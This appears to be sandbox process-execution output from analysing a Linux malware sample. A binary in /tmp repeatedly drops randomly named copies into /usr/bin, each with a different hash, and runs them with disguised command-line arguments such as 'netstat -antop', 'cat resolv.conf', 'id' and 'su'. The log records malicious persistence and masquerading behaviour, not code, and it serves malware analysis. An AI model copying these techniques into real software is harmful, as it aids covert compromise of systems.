                                                        Arguments:/usr/bin/hiueshutol "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:/usr/bin/hiueshutol uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:/usr/bin/hiueshutol "route -n" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:/usr/bin/hiueshutol ifconfig 9452
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:10
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hiueshutol
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:5ca107404275778ca2b07a8590d03272

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:/usr/bin/mhvrcmaysv "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:/usr/bin/mhvrcmaysv "ls -la" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:15
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:/usr/bin/mhvrcmaysv top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:/usr/bin/mhvrcmaysv "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:/usr/bin/mhvrcmaysv "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:16
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/mhvrcmaysv
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9b1da24294ced34670c702e0fdefa42b

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:/usr/bin/chdmwyeiia "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:/usr/bin/chdmwyeiia "ls -la" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:/usr/bin/chdmwyeiia who 9452
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:/usr/bin/chdmwyeiia id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:/usr/bin/chdmwyeiia "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:21
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/chdmwyeiia
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:c71c4deef5f37dfdbf1ca7d11b856b4e

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:/usr/bin/emnaztxelb "netstat -an" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:/usr/bin/emnaztxelb "echo \"find\"" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:/usr/bin/emnaztxelb "sleep 1" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:/usr/bin/emnaztxelb "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:/usr/bin/emnaztxelb "route -n" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:27
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/emnaztxelb
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:4f6482237e09cca4828411f8386581fc

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:/usr/bin/yimgbvpxre sh 9452
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:/usr/bin/yimgbvpxre bash 9452
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:/usr/bin/yimgbvpxre "grep \"A\"" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:32
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:/usr/bin/yimgbvpxre "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:/usr/bin/yimgbvpxre "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:33
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/yimgbvpxre
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:adef4f6dadd60e09a59e134c5a659f30

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:/usr/bin/hjqubeqdgt uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:/usr/bin/hjqubeqdgt su 9452
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:/usr/bin/hjqubeqdgt "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:/usr/bin/hjqubeqdgt id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:/usr/bin/hjqubeqdgt "ifconfig eth0" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:38
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/hjqubeqdgt
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:3173c41f0c1b9dfa58d0d6379d71d08f

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:/usr/bin/tqltcdysxm top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:/usr/bin/tqltcdysxm "route -n" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:/usr/bin/tqltcdysxm "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/tqltcdysxm
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:7d8d4986b078e4b4d548d598944da309

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:54:44
                                                        Start date:04/04/2023
